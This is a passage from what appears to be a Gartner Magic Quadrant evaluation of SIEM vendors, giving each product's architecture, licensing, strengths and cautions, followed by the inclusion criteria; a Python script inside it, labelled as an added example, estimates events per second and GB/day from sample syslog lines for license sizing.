CAUTIONS
  • Endpoint monitoring for threat detection and response, or basic file integrity, requires use of third-party technologies. IBM has positioned its BigFix product as a component in this space, especially for security response activities, but there has been very little interest from Gartner clients for this approach.
  • Gartner clients that have deployed or are considering QRadar have not expressed much interest in QRadar Advisor with Watson.
  • While IBM has introduced its UBA and ML apps, UBA features lag behind the UEBA-centric SIEM vendors. Integrations with several UEBA vendors are supported through QRadar App Exchange.
  • IBM Resilient still lacks native integration into the QRadar platform. Integration is available through QRadar App Exchange.
  • Customer feedback on the QRadar architecture is generally positive, but for buyers requiring a multicomponent-based architecture, the number of licensable components and options required generates confusion as part of the acquisition and purchase process.

LogRhythm

LogRhythm Threat Lifecycle Management Platform provides core SIEM capabilities, in addition to optional add-ons for network and host monitoring. LogRhythm’s SIEM solution consists of several components that can be run from a single appliance or separately as discrete components — Data Collector, Data Processor, Data Indexer, AI Engine, Platform Manager and WebUI Services. System Monitor Agents (available for Windows, Unix and Linux platforms and in two flavors — Pro and Lite) provide FIM functions, but can also act as event forwarders to Data Collectors. Network Monitor provides network and application traffic visibility, as well as selective packet capture for forensic purposes. LogRhythm’s SIEM can be deployed in a variety of ways — as software, or as physical or virtual appliances, either as a single appliance solution or for the various discrete components to support a variety of architectural approaches. LogRhythm can be deployed on-premises, in IaaS and in hybrid operating models. Multitenancy for MSSP buyers is also natively supported. LogRhythm SIEM is a velocity-based license approach measured by messages per second (MPS), and licenses are available as perpetual or term. Enterprise license agreements are also available. Physical appliances are available for additional charge. System Monitor is priced per host and Network Monitor is priced per gigabits throughput.

In the past 12 months, LogRhythm has made usability improvements across a variety of functions and features, including case management, workflow and response (via the SmartResponse feature), user monitoring analytics and real-time monitoring. It has also delivered enhancements to System Monitor and Network Monitor (including expansion into OT environment monitoring) and content updates delivered via AI Engine.

STRENGTHS
  • LogRhythm provides a strong platform for organizations that want a contained platform that includes core SIEM capabilities enhanced by complementary host and network monitoring capabilities, in a solution that can scale from a single appliance up to n-tier architectures.
  • LogRhythm’s out-of-the-box content (and updates delivered to the AI Engine component), along with a powerful user interface, provides a strong real-time monitoring experience for users.
  • SmartResponse allows users to integrate preconfigured automated response activities into their alert, investigation and response activities, either fully automated or semiautomated (e.g., manually initiated).
  • Organizations considering security monitoring of ICS/SCADA or OT environments, or looking to merge security event monitoring of their IT and OT environments, should consider LogRhythm.
  • Gartner clients, particularly midsize and smaller enterprise organizations, report that the simplified deployment model and support by LogRhythm via the Core Deployment Service is useful. Customers with specific use cases indicate that the Analytics Co-Pilot Service is also useful to speed up implementation times.
CAUTIONS
  • LogRhythm lags the UEBA-centric SIEM vendors in ML-driven analytics. The vendor has announced a cloud-based advanced analytics capability called CloudAI, which was released to a limited number of users in early 2017, with general availability targeted for 4Q17.
  • Unlike several competing products, there is no application store for easily integrating third-party solutions, and the platform’s APIs are less open to third parties, making integrations harder to build, although LogRhythm has a partner program to facilitate custom integrations.
  • LogRhythm supports a limited number of threat intelligence feeds out of the box, although users can add custom STIX/TAXII feeds with the LogRhythm TIS utility, and LogRhythm provides API-based support for other formats. Buyers with third-party threat intelligence feeds should confirm support with LogRhythm.
  • A few customers have expressed concerns about LogRhythm’s ability to scale to support very high event volume environments. Buyers with those environments should validate LogRhythm’s ability to support anticipated event and data volumes.
  • Some Gartner clients have raised concerns about the use of Windows as the underlying platform for components in the overall architecture (the Data Indexer is Linux-based), especially around maintaining patch and hotfix currency. Buyers should follow patching best practices and monitor LogRhythm for patch advisories.

ManageEngine

Log360 is the SIEM offering from ManageEngine, a division of Zoho. ManageEngine Log360 is composed of three components — EventLog Analyzer, which provides core SEM and SIM features including event log management, correlation-based analytics, and management/UI for reports, dashboards and log search functionality; ADAudit Plus, which provides real-time monitoring and auditing for AD; and Cloud Security Plus, which manages log event data from public cloud environments. EventLog Analyzer is offered in two versions: Premium is for single instance deployment, and Distributed, which uses a centralized admin server, is for large organizations or MSPs/MSSPs that need to scale horizontally beyond a single EventLog Analyzer instance (e.g., multitenant use cases or a single, geographically distributed organization). ADAudit Plus is offered in two versions — Standard and Professional — depending on the features required. Log360 is only available as a software version, but can be installed into virtual environments. It is licensed by the software components, version, and number of event log and data sources.

Over the past 12 months, ManageEngine has added support for monitoring AWS and Azure public cloud services, enhanced analytics with field-level correlation, improved incident response capabilities and integrations with service desk solutions. It has also added out-of-the-box threat intelligence feeds and improved auditing of AD (e.g., AD Federation Services [ADFS] and AD Lightweight Directory Services [ADLDS]), among other enhancements.

STRENGTHS
  • Either ManageEngine Log360 or EventLog Analyzer is a good choice for existing ManageEngine customers looking for an integrated solution, as well as for organizations looking for a simple, cost-effective SIEM solution.
  • ManageEngine provides strong auditing and compliance capabilities. Over 1,200 predefined reports, including various compliance-focused ones, are available out of the box.
  • ADAudit Plus provides stand-alone or integrated monitoring of AD for identity and access governance requirements.
  • ManageEngine’s architecture and deployment are straightforward and easier to deploy than many SIEM solutions. Log360 includes a wide range of out-of-the-box correlation rules as well as threat intelligence feeds. Organizations primarily using Windows are well-supported with built-in log source identification and integration capabilities.
CAUTIONS
  • EventLog Analyzer only provides basic SIEM threat detection functionality. Support is lacking for third-party threat intelligence feeds and for network-based traffic data (e.g., NetFlow).
  • Log360 integrates EventLog Analyzer and ADAudit Plus; however, analysts are required to use two different interfaces to perform various activities, such as monitoring for new incidents, investigations and reporting.
  • Scalability of the platform may present challenges for larger organizations. Buyers should confirm that event and data volumes, and AD sizes, are supported. Horizontal scaling is supported, but n-tier scalability may be a challenge.
  • ManageEngine buyers report difficulty working with remote support staff after purchase.
  • ManageEngine has little visibility with Gartner clients for SIEM use cases.

McAfee

McAfee Enterprise Security Manager (ESM) provides core SIEM functionality, including a web-based user interface, a parsed event database, reporting capabilities and central management of the other components in the solution. Those other components include Event Receiver (ERC), which provides event and flow collection, and event parsing and normalization; Enterprise Log Manager (ELM), which collects, manages and stores all raw events; Advanced Correlation Engine (ACE), which provides real-time analytics using four types of correlation approaches (rule-based, risk-based, statistical and historical); and Enterprise Log Search (ELS) for log search functionality. Buyers can also purchase the McAfee Database Event Monitor (DEM), which provides real-time discovery and transaction-level database monitoring; Application Data Monitor (ADM), which provides application-level (Layer 7) decoding and inspection of network traffic; and Global Threat Intelligence (GTI), a threat intelligence feed produced by McAfee Labs. The McAfee SIEM can be deployed as physical or virtual appliances, either as an all-in-one offering (where the ESM, ELM and ERC components are on a single appliance) or as individual, discrete components. Physical and virtual appliances can be run together in hybrid deployments. The flexible deployment options support n-tier architectures. McAfee’s SIEM solution is licensed as a perpetual model, primarily by maximum event volume per appliance as measured in EPS. Physical appliances are an additional charge. McAfee ADM is licensed by bandwidth in gigabytes per second, and GTI is licensed per ESM server deployed.

Over the last year, McAfee has primarily focused on transitioning the underlying ESM architecture to a big data-based approach that leverages technologies like Elasticsearch and Kafka, which is supported with the release of a new generation of physical appliances (although many earlier appliance models support the new architecture too). The user experience was also addressed via a new HTML5-based interface that includes improved visualizations and workflow capabilities (although the new interface is not yet available across the entire solution). Forensics capabilities were improved via the release of ELS.

STRENGTHS
  • McAfee’s architecture and licensing approach, especially for buyers looking for turnkey appliances (both physical and virtual), simplifies purchases and deployments.
  • Customers of other McAfee products, as well as the large set of vendors that are part of the McAfee Security Innovation Alliance, will benefit from native integrations as well as interoperability provided by the Data Exchange Layer (DXL) framework.
  • Organizations that require SEM of OT environments (ICS/SCADA) should consider ESM and ADM due to a long history of supporting OT environments (e.g., being able to run as a “one-way diode”) and through specific prepackaged content (rules, dashboards and reports).
  • Customer satisfaction, with both the product and support, over the past 12 months has improved compared to previous periods.
CAUTIONS
  • McAfee lacks advanced, machine-driven analytics capabilities, compared to leading competitors. The planned changes to the platform to run on a big data architecture should enable development of these capabilities.
  • McAfee ESM has workflow and case management, but is lacking in automation and orchestration capabilities. Integration with many third-party security orchestration, automation and response (SOAR) tools is available.
  • Customers report ongoing concerns about options for training and education on the ESM platform.

Micro Focus (ArcSight)

In September 2017, Hewlett Packard Enterprise (HPE) and Micro Focus closed a business transaction that resulted in the ArcSight SIEM product becoming part of the Micro Focus business. ArcSight Enterprise Security Manager (ESM) is the core component of ArcSight’s SIEM solution. Data collection and management is enabled by ArcSight Data Platform (ADP), which uses HDFS, Kafka, Logger and Connectors (both prepackaged SmartConnectors and customizable FlexConnectors). The ArcSight Management Center (ArcMC) handles configuration management. ESM provides real-time analytics and monitoring, search, reporting, case management, and workflow. ArcSight ESM Express is available for single, all-in-one system implementations. ArcSight Investigate, built on top of Micro Focus Vertica, is a purpose-built big data and analytics platform that enables data search for incident investigation as well as threat hunting. UBA is provided via a repackaged version of Securonix Bolt that delivers advanced analytics-based user monitoring capabilities (peer group analysis and ML). DNS Malware Analytics (DMA) is a SaaS-delivered solution that applies advanced analytics to DNS events to detect malware-infected hosts. DMA will be incorporated into the next release of ArcSight Investigate. The solution can be deployed as a physical appliance or as software, with bare-metal, virtual and IaaS options supported. Multitenant functionality is native to the platform.

STRENGTHS
  • ArcSight has a large installed base of customers using the SIEM product for large, complex SOC environments and for more basic log collection use cases. There is widespread professional services and third-party monitoring support for ArcSight.
  • ArcSight supports acquisition and parsing of data from a broad range of sources, connector customization that allows normalization of a broad range of event sources and an open platform that enables structured data to be used outside of the ArcSight solution.
  • ArcSight can be extensively customized to support threat management and compliance-focused use cases. ArcSight’s robust API enables extensive integrations in SOC environments.
CAUTIONS
  • Prior to the acquisition by Micro Focus, ArcSight was updating several elements of its architecture. ArcSight users and prospective customers should seek assurances that Micro Focus will meet commitments for product feature/function improvements and support. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in ArcSight, leveraging the combined expertise and technology from the legacy companies for the foreseeable future.
  • Licensing may be problematic for buyers, with volume-based (for ADP), velocity-based (for ESM) and user-based (for UBA) pricing schemes. Current customers that are converting from legacy licensing models to new licenses and the ADP architecture have reported issues with license conversion complexity and costs. To address these concerns, Micro Focus has implemented changes to its license model that include a pricing option that is free of data restrictions.
  • The ArcSight architecture is undergoing changes, with the introduction of ADP, Investigate and other components to support scalable, richer analytics and response, while at the same time supporting legacy functionality. As a result, customer choices regarding the deployment of some elements of the solution can result in duplication of data.

Micro Focus (NetIQ)

NetIQ Sentinel is a SIEM solution from Micro Focus. Sentinel Enterprise is the full SIEM solution that provides SIM and SEM capabilities to support both threat detection- and compliance-oriented use cases. Sentinel for Log Management provides log management, search and reporting capabilities, and can be upgraded to Enterprise. Additional components in the platform include Identity Tracking (a combined solution of Micro Focus Identity Manager and Sentinel with user-monitoring-focused content), Change Guardian (for host-based change and file monitoring), Exploit Detection (a threat and vulnerability management intelligence subscription), Secure Configuration Manager, and Aegis (which adds automation to the native Sentinel iTrace workflow). Sentinel can be deployed as software on Linux or as a virtual appliance on VMware, Hyper-V and Xen, and allows for flexible horizontal scaling. Sentinel is licensed based on EPS, event sources and optional components. Multitenant capabilities are natively supported.

Over the past 12 months, Micro Focus introduced Sentinel version 8, which includes an optional big data storage back end built on Cloudera Hadoop and a Threat Response Dashboard. Other functional and operational enhancements were also added.

STRENGTHS
  • Sentinel Enterprise supports organizations that have large-scale deployment requirements underpinned by core SIEM capabilities, along with native workflow and automation capabilities.
  • Tight integration between Micro Focus’ IAM, SIEM and IT operations tools provides organizations with a single view into user activity across the IT environment.
  • Sentinel’s Hadoop-based log management tier provides flexible and horizontally scalable data collection, along with support for third-party solutions that can integrate with data from Hadoop platforms (e.g., UEBA tools).
  • Sentinel’s architecture is one of the simpler solutions to deploy and manage compared to competing products. Scaling and distribution only require installing additional Sentinel instances.
CAUTIONS
  • The merger of Micro Focus and the software business from HPE resulted in ArcSight SIEM technology becoming part of Micro Focus. Users and prospective buyers should seek assurances from Micro Focus regarding roadmaps. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in Sentinel and ArcSight, leveraging the combined expertise and technologies from both for the foreseeable future.
  • Advanced analytics in Sentinel are lagging compared to competing SIEM solutions. However, support for Hadoop-based event and data management should make integration with stand-alone UEBA solutions easier.
  • Support for log and event data collection and monitoring for SaaS, such as Office 365, Salesforce and Box, is lacking.
  • Integration of third-party solutions and content is provided, but the lack of an app store experience makes it less user-friendly than competitive products.
  • Micro Focus NetIQ Sentinel has low visibility with Gartner clients in competitive evaluations of SIEM platforms.

Rapid7

InsightIDR is Rapid7’s SIEM solution, delivered as a service via the Insight platform. The solution consists of the InsightIDR service, EDR agents and honeypots. InsightIDR provides core SIEM features like log collection and management, threat detection rules and correlations, advanced analytics, dashboards, case management, and workflow and reporting. InsightIDR is built on Rapid7’s UserInsight (now InsightUBA) UEBA solution and the acquired Logentries technology. Advanced analytics with a focus on user behavior is a core component of InsightIDR. Buyers deploying the solution will need to install Collectors, available for Windows Server or Linux and usually deployed in a ratio of one per location (physical and IaaS), to collect, aggregate and forward logs to the InsightIDR platform. The EDR agents also support local event log forwarding. Scalability is managed by Rapid7. Rapid7’s managed detection and response (MDR) service provides 24/7 SEM for buyers that require a service overlay. InsightIDR is licensed by annual subscription based on the number of monitored assets, which is any device connected to the buyer’s network that generates security data (e.g., desktops, laptops, tablets and servers). Data retention is 90 days, but extended data storage can be added for an additional charge.

STRENGTHS
  • InsightIDR is delivered as a service, thus the architecture and implementation is simplified. Ongoing maintenance of the platform (performance management, upgrades, scaling) is not required of the user as it’s fully managed by Rapid7.
  • Advanced analytics, particularly UEBA, is provided as part of the core solution.
  • Monitoring and responding to alerts is supported by the guided investigation feature, making it easier for less experienced users to leverage the solution.
  • EDR and honeypot technology are included with the price of the solution, allowing users to leverage advanced threat detection technologies along with InsightIDR.
CAUTIONS
  • InsightIDR is relatively new to the SIEM solution market and is less feature-rich compared with more mature SIEM solutions in areas such as reporting and the number of supported log event and data sources (but popular SaaS vendors are natively supported).
  • Workflow and case management is basic, and there is a lack of orchestration and response features. Rapid7 acquired an IT operations and security orchestration and automation company, Komand, in July 2017, which could address this gap in the future.
  • The as-a-service model may not meet the requirements of all buyers. There is no on-premises version of the solution for buyers that have concerns about transmitting data and having that data stored off-premises. If network connectivity to Rapid7 is impaired, availability of the solution will be affected.

Securonix

Securonix’s SIEM platform is branded as Snypr Security Analytics and runs on top of a Hadoop big data platform. Snypr incorporates an event and data collection and management tier, advanced analytics that include native UEBA functionality as well as a threat library of traditional signatures and rules, and case management and workflow functions. Snypr components include the Console, which provides the UI and configuration functions; Search Service for indexing and searching across all stored data; Enrichment Service for handling data parsing, normalization and event enrichment; Correlation Service for correlation rules; Behavior Science for ML analytics; Risk Scoring Service for threat modeling and indicator-based analytics; Storage Service; Indexing Service; Centralized Ingestion Service; and Ingesters for collecting and forwarding data to the Centralized Ingestion Service. Premium apps include prepackaged behavior models, rules, reports and dashboards across a variety of security monitoring use cases, such as privileged account misuse, data security, cyberthreats, access, application security, cloud security and fraud. Advanced incident investigation and threat hunting requirements are supported by Securonix’s Spotter capability. Snypr can be deployed in a variety of ways, including as software that bundles the Hadoop environment, or as software that uses a buyer’s existing Hadoop environment. For faster implementations, both physical appliance and hosted as-a-service options are available. Securonix licenses Snypr and the premium content apps on a term basis, priced by the number of users in the organization.

Over the past 12 months, Securonix added improvements around SEM, such as use-case-specific packaged content; enhancements in dashboard features and functionality that help address compliance-, threat- and operational-driven uses; the Securonix Threat Model Exchange for users to share use-case content from a central community-driven location; and the introduction of an as-a-service option.

STRENGTHS
  • Securonix Snypr provides both rule-based and UEBA capabilities as part of the core platform.
  • The Securonix licensing model is straightforward and easy for buyers to understand.
  • Securonix has a large set of partners and supports a wide variety of third-party solutions out of the box, including endpoint protection platforms, data loss prevention, cloud access security brokers, firewalls, healthcare solutions and access management solutions.
CAUTIONS
  • Native workflow and case management is relatively basic. More advanced orchestration and automation capabilities are available via API integration. Integrations with third-party solutions, such as ServiceNow, Jira and Remedy service desk solutions, are supported, as well as SOAR solutions like Microsoft-Hexadite and Phantom.
  • Since Snypr runs on a commercial Hadoop platform, it introduces a different architecture compared to more traditional SIEM solutions, and may require a learning curve to understand how to manage, monitor and troubleshoot the various components running on the platform (e.g., Kafka, Solr, HBase, Spark and HDFS).
  • Securonix lacks native advanced threat defense solutions, relying on integrations with third-party solutions for those functions (e.g., host and network forensics).

SolarWinds

SolarWinds Log & Event Manager (LEM) provides SEM and SIM functionality delivered as a virtual appliance for VMware and Hyper-V platforms. SolarWinds LEM is composed of Manager, which provides central management of the overall solution as well as log and event management and storage; Console, which provides the user interface; and Agents. The LEM Agents provide real-time event collection from endpoints, handle encryption and compression of data sent to the Manager, and also provide basic DLP (called USB Defender), FIM and automated, active response capabilities. Support for other security monitoring and context sources, such as network traffic, application and virtualized platform monitoring, is available through other SolarWinds solutions such as Virtualization Manager, Network Performance Monitor, and Server & Application Monitor. SolarWinds LEM is licensed per number of event source nodes and includes all components, including Agents and threat intelligence feeds.

Over the past 12 months, SolarWinds added multifactor authentication to the Console, along with feature and functionality upgrades for new device and application event sources. The vendor also improved capabilities for monitoring LEM health through other SolarWinds applications.

STRENGTHS
  • SolarWinds LEM provides a well-integrated solution across a variety of IT operation capabilities, making it a good option for SMBs where security operations responsibilities are federated across IT teams and staff.
  • LEM supports a variety of event sources, including nonevent data sources that can be integrated into its analytics and correlation rules.
  • SolarWinds’ simple architecture, easy licensing, and robust out-of-the-box content and features — some found in more complex SIEM solutions — make it a good fit for SMB security operations and compliance use cases.
  • The automated response capability based on the endpoint agent for Windows provides some threat containment and quarantine control capabilities not normally found with many competing SIEM solutions.
  • SolarWinds has moderate visibility with Gartner clients, particularly midsize and smaller enterprise clients.
CAUTIONS
  • SolarWinds LEM is a closed ecosystem, limiting the ability to integrate it with third-party security solutions, particularly advanced threat detection, threat intelligence feeds and UEBA tools. Integrations with service desk tools are also limited to one-way connectivity via email and SNMP.
  • LEM’s architecture scales horizontally to support thousands of nodes, but it doesn’t scale vertically and has an event data storage limit, which the vendor plans to address in a future release.
  • Monitoring of SaaS is not supported, and monitoring of IaaS is limited. Buyers that wish to extend monitoring to networks and applications must purchase other SolarWinds solutions to address those requirements.

Splunk

Splunk’s Security Intelligence Platform is composed of Splunk Enterprise and two premium solutions, Enterprise Security (ES) and Splunk User Behavior Analytics (UBA). Splunk Enterprise is the core component of the product, providing event and data collection, a variety of analytics capabilities, search, and visualizations. Splunk Enterprise (aka Core Splunk) and Splunk Cloud provide use-case-agnostic data analysis capabilities that are used for various purposes like IT operations, application and network performance monitoring, business intelligence, and some security use cases. The premium ES solution delivers most of the security-monitoring-specific capabilities, including prepackaged security-specific queries, visualizations and dashboards, as well as case management, workflow and incident response capabilities. UBA adds machine-driven, advanced analytics that complement the query-oriented approach of ES. Splunk offers a variety of complementary apps for security use cases, made available through Splunkbase. Example apps include App for PCI Compliance; Stream, which ingests network packet data directly off the wire; Analytics for Hadoop (formerly Hunk), which integrates Splunk with Hadoop environments; and Machine Learning Toolkit for users that want to create their own ML-driven analytics. Splunk supports a variety of deployment options, such as software that can be run on-premises, in IaaS and as a hybrid model. Splunk Cloud is a Splunk-hosted and -operated SaaS solution using AWS infrastructure. Core Splunk and Splunk Cloud components consist of Universal Forwarders, Indexers and Search Heads supporting n-tier architectures, as well as multiple use cases and premium solutions. Splunk is licensed based on the amount of data ingested into the platform, measured in gigabytes per day. ES is also licensed by gigabytes per day, whereas UBA is licensed by the number of user accounts in an organization, and all of these are available either as a perpetual or term license.

Over the past 12 months, Splunk has primarily delivered a variety of performance and usability enhancements to Core, ES and UBA. Splunk introduced a new open-visualization approach and the Machine Learning Toolkit app that supports user-generated, machine-based analytics. Support for Okta, Azure AD and ADFS was added. Enhancements were also made to the incident response features in ES (called Adaptive Response), further enabling orchestration and automated response capabilities. Improved integration between ES and UBA events, alerts and identity resolution was also added.

STRENGTHS
  • Splunk provides a full suite of solutions oriented toward SEM that allow users to grow into the platform over time (e.g., starting with Core, then adding ES and UBA).
  • Advanced analytics capabilities are available through a variety of means across the Splunk ecosystem (e.g., built into the core search capabilities, with Machine Learning Toolkit, prepackaged in UBA or via third-party app providers).
  • Splunk has a large partner ecosystem that provides integration and Splunk-specific content that is made available through the Splunkbase application store.
  • Many organizations start implementing Splunk for other use cases, easing the path for security teams looking to add a SIEM solution to their environment as the core infrastructure and event log sources are already in place.
  • Splunk has significant visibility with Gartner clients, consistently appearing on buyers’ shortlists.
CAUTIONS
  • Gartner clients that have implemented Splunk consistently raise concerns about the licensing model and overall cost to implement the solution. Splunk has introduced new licensing approaches, such as the Enterprise Adoption Agreement (EAA) as well as additional license headroom for new users with periodic license true-ups, to address these concerns.
  • Splunk UBA is visible on shortlists of Splunk users seeking to add UEBA features, but competes with other UEBA solutions, some of which also offer SIEM functionality. Buyers considering using Splunk for SIEM and a third-party solution for UEBA must validate the degree of integration of the solutions and assess the commitment of the respective vendors to continued integration.
  • Splunk does not offer an appliance version of the solution. Organizations that want an on-premises appliance version must work with a Splunk partner that provides the integration on supported hardware.
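Several of the cautions above (LogRhythm and ManageEngine on validating anticipated event volumes, Splunk on ingest-based cost) come down to the same buyer homework: measure your own event rate and daily byte volume before comparing velocity-based (EPS/MPS) and volume-based (GB/day) license models. The script below is an added example written for this page, not code from Gartner or from any vendor in the report. It parses a constructed sample of RFC 3164-style syslog lines (the hostnames, addresses and messages are made up) and derives sustained EPS, peak EPS and an extrapolated GB/day figure; the 1.5x headroom factor in size_license is an assumed planning margin, not a vendor figure.

```python
"""Estimate SIEM licensing drivers (peak/sustained EPS and GB/day) from a log sample."""
import math
import re
from collections import Counter
from datetime import datetime

# Constructed sample of RFC 3164-style syslog lines; not captured from any real system.
SAMPLE_LOG = """\
Jan 12 10:00:00 fw01 kernel: DROP IN=eth0 SRC=10.0.0.5 DST=10.0.0.1 PROTO=TCP DPT=22
Jan 12 10:00:00 fw01 kernel: DROP IN=eth0 SRC=10.0.0.6 DST=10.0.0.1 PROTO=TCP DPT=23
Jan 12 10:00:00 web01 sshd[1201]: Failed password for root from 10.0.0.7 port 51022 ssh2
Jan 12 10:00:01 web01 sshd[1201]: Accepted publickey for deploy from 10.0.0.8 port 51023 ssh2
Jan 12 10:00:02 dc01 audit: logon type=3 user=alice result=success
Jan 12 10:00:02 dc01 audit: logon type=3 user=bob result=failure
"""

# RFC 3164 timestamps carry no year, so the caller supplies one for parsing.
SYSLOG_TS = re.compile(r"^(\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s")


def parse_timestamp(line, year=2017):
    """Return the line's timestamp as a datetime, or None if the line is not syslog-shaped."""
    m = SYSLOG_TS.match(line)
    if not m:
        return None
    return datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")


def measure(log_text, year=2017):
    """Bucket events per second and compute the numbers a license discussion needs."""
    per_second = Counter()
    total_bytes = 0
    skipped = 0
    for raw in log_text.splitlines():
        ts = parse_timestamp(raw, year)
        if ts is None:
            skipped += 1  # unparsable lines still cost ingest; flag them rather than hide them
            continue
        per_second[ts] += 1
        total_bytes += len(raw.encode()) + 1  # +1 for the newline the SIEM also stores
    events = sum(per_second.values())
    if events == 0:
        raise ValueError("no parsable syslog lines in sample")
    # Elapsed seconds covered by the sample, inclusive of both end buckets.
    span_s = (max(per_second) - min(per_second)).total_seconds() + 1
    avg_eps = events / span_s
    avg_bytes = total_bytes / events
    return {
        "events": events,
        "skipped": skipped,
        "total_bytes": total_bytes,
        "avg_eps": avg_eps,                       # sustained rate: what GB/day licensing sees
        "peak_eps": max(per_second.values()),     # burst rate: what EPS/MPS licensing sees
        "avg_bytes": avg_bytes,
        "gb_per_day": avg_eps * avg_bytes * 86400 / 1e9,
    }


def size_license(metrics, headroom=1.5):
    """Apply an assumed headroom factor to the measured figures (the 1.5x is a planning
    assumption for this example, not a vendor recommendation)."""
    return {
        "eps_tier": math.ceil(metrics["peak_eps"] * headroom),
        "gb_per_day": metrics["gb_per_day"] * headroom,
    }


if __name__ == "__main__":
    m = measure(SAMPLE_LOG)
    print(f"events={m['events']} skipped={m['skipped']} "
          f"avg_eps={m['avg_eps']:.2f} peak_eps={m['peak_eps']} "
          f"avg_bytes={m['avg_bytes']:.1f} gb_per_day={m['gb_per_day']:.4f}")
    print("with headroom:", size_license(m))
```

Run it against a day or more of real syslog, not a six-line sample, and keep the peak and sustained figures separate: a velocity-licensed product must absorb the peak without dropping events, whereas a GB/day license is driven by the average byte volume, so a chatty firewall can be cheap under one model and expensive under the other.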

Trustwave

Trustwave’s SIEM solution is composed of two versions — SIEM Enterprise and Log Management Enterprise (LME). Both products complement Trustwave’s broader security offerings across network, endpoint, and content and data security. Customers consuming SIEM Enterprise as a service use the local collector appliance (LCA). The SIEM Enterprise solution is composed of the following components: DA or LCA for event and data collection and normalization; Threat Detection and Threat Evaluation (TD&TE) for real-time analytics and alerting; and the Secure Data Warehouse (SDW) for data storage and historical analysis. SIEM Enterprise, LME and LCA can be deployed as physical or virtual appliances. The architecture can run as an all-in-one solution, and can scale both horizontally and vertically across on-premises and IaaS environments (i.e., a hybrid approach). Trustwave offers a variety of co-managed or hybrid services augmenting its security management products. Trustwave’s licensing is primarily based on appliance costs and the velocity of events processed per day (EPD). Services are charged based on the size of the SIEM environment and the number and types of event sources.

Over the past 12 months, Trustwave has made additions and enhancements to the core platform, primarily around event collection and parsing; connectivity to cloud-based services; added support for deployment in AWS, Azure and CenturyLink; and improved storage capabilities and security.

STRENGTHS
  • Trustwave has built integrations across its security product portfolio, making its SIEM a viable option for customers of other Trustwave security products.
  • Trustwave offers flexible deployment and service options, including co-management and hybrid deployments, which is a good fit for midmarket organizations and buyers with diverse IT environments (across geographies, on-premises and IaaS).
  • SIEM Enterprise has good out-of-the-box support for event and data sources, as well as reports across a variety of regulatory and security frameworks.
  • SIEM Enterprise provides core SEM and SIM capabilities that can support both small environments and large organizations and MSSPs requiring multitenant support.
  • Midmarket customers can adopt LME and then grow into SIEM Enterprise via a simple license key upgrade.
CAUTIONS
  • Trustwave SIEM Enterprise lags the competition in integration with third-party security solutions. The addition of RESTful API support, which Trustwave added this year, should make this easier in the future.
  • SIEM Enterprise lacks advanced analytics and user-behavior-based analytics, as well as integration with big data solutions and stand-alone UEBA solutions.
  • Threat intelligence feeds are not provided out of the box. Buyers must add on Trustwave SpiderLabs research team feeds as a premium. Native SIEM integration with third-party threat intelligence feeds is not directly supported.
  • Trustwave has little visibility in competitive evaluations of SIEM solutions among Gartner clients.

Venustech

The Venustech SIEM solution is composed of various components under the Venusense Unified Security Management (USM) product, which includes modules for Security Analytics (SA), Network Behavior Analysis (NBA), Configuration Verification System (CVS) and Business Security Management (BSM). Venusense SA provides log collection, normalization and storage, and an analytics engine for threat detection and compliance use cases. It is based on a big data platform, with both Hadoop and Elasticsearch options available, that enables ML analytics in addition to standard correlation-based detection. The solution can be deployed via software, or as a virtual or physical appliance (the NBA solution is only available as a physical appliance). Venustech also offers a variety of security technologies in addition to its SIEM solution, focused on the Chinese and Asia/Pacific region markets, with solutions that cover firewalls and UTMs, web application firewalls, intrusion detection, vulnerability scanning, VPN, and other products. The solution is licensed by the core product version (back-end data tier), number of data source nodes and add-on functional modules.

Over the past year, Venustech introduced a number of new capabilities and enhancements, including its big data architecture and new UI based on HTML5, support for OT/ICS environments, and a new version of its NBA tool.

STRENGTHS
  • Venustech is a good solution for Chinese organizations, both midsize and enterprise-sized, and buyers in the Asia/Pacific markets where Venustech’s security solutions are used. Both Chinese and English are supported out of the box.
  • Venustech’s SIEM solution provides core SEM and SIM functionality that can be expanded to address a variety of network-based monitoring, as well as other security operations and risk management capabilities.
  • The Venustech SIEM architecture is straightforward and offers flexible, horizontal scaling.
  • Venustech’s SIEM solution provides a variety of data management tiers to fit different buyer types (e.g., midsize versus large enterprises).
  • Advanced analytics using ML for modeling network-based entity behavior is provided out of the box.
CAUTIONS
  • Venustech’s SIEM solution lacks the ability to monitor IaaS and SaaS solutions popular outside of the Chinese market, such as AWS, Azure, Office 365, Box and Salesforce. Support is provided for Alibaba Cloud and Tencent Cloud environments.
  • Venustech offers three versions of data management to support small- to large-scale deployments. Potential customers must understand the use cases and data volumes they need to support in order to choose the appropriate data management architecture.
  • The number of out-of-the-box parsers and report templates, especially regulatory reports outside those needed by Chinese organizations, is lower than that of competing SIEM solutions.
  • Venustech has little visibility with Gartner clients, including those in the Asia/Pacific region, relative to other competing SIEM solutions.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Exabeam
  • FireEye
  • Rapid7
  • Securonix
  • Venustech

Dropped

No vendors were dropped from this Magic Quadrant.

Inclusion and Exclusion Criteria

The inclusion criteria represent the specific attributes that analysts believe are necessary for inclusion in this research.

To qualify for inclusion:

  • The product must be generally available and provide SIM and SEM capabilities.
  • The product must support data capture from heterogeneous data sources, including network devices, security devices, security programs and servers.
  • The vendor must appear on the SIEM product evaluation lists of end-user organizations.
  • The solution must be delivered to the customer environment as a software- or appliance-based product or in an as-a-service model.
  • SIEM revenue (net-new license revenue plus maintenance) must be at least $15 million for 2016.

Evaluation Criteria

Ability to Execute

  • Product or Service evaluates the vendor’s ability and track record to provide product functions in areas such as real-time security monitoring, security analytics, incident management and response, reporting, and deployment simplicity.
  • Overall Viability includes an assessment of the technology provider’s financial health, the financial and practical success of the overall company, and the likelihood that the technology provider will continue to invest in SIEM technology.
  • Sales Execution/Pricing evaluates the technology provider’s success in the SIEM market and its capabilities in presales activities. This includes SIEM revenue and the installed base size, growth rates for SIEM revenue and the installed base, presales support, and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.
